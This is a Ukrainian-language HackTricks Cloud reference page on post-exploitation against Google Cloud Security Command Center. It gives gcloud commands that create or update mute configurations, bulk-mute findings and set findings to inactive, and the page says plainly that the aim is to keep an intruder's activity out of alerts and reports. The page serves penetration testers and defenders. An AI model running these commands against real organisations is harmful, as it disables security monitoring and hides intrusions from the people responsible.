Ukranian - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

GCP - Security Post Exploitation

Підтримайте HackTricks

Security

Для отримання додаткової інформації перегляньте:

GCP - Security Enum

securitycenter.muteconfigs.create

Запобігайте генерації знахідок, які можуть виявити зловмисника, створюючи muteconfig:

# Create Muteconfig
gcloud scc muteconfigs create my-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""

securitycenter.muteconfigs.update

Запобігання генерації знахідок, які можуть виявити атакуючого, шляхом оновлення muteconfig:

# Update Muteconfig
gcloud scc muteconfigs update my-test-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""

securitycenter.findings.bulkMuteUpdate

Вимкнути сповіщення на основі фільтра:

# Mute based on a filter
gcloud scc findings bulk-mute --organization=929851756715 --filter="category=\"XSS_SCRIPTING\""

Приглушене виявлення не з'явиться на панелі інструментів та у звітах SCC.

securitycenter.findings.setMute

Приглушення виявлень на основі джерела, виявлень...

gcloud scc findings set-mute 789 --organization=organizations/123 --source=456 --mute=MUTED

securitycenter.findings.update

Оновіть знахідку, щоб вказати на помилкову інформацію:

gcloud scc findings update `myFinding` --organization=123456 --source=5678 --state=INACTIVE
Підтримайте HackTricks
PreviousGCP - Secretmanager Post ExploitationNextGCP - Workflows Post Exploitation

Last updated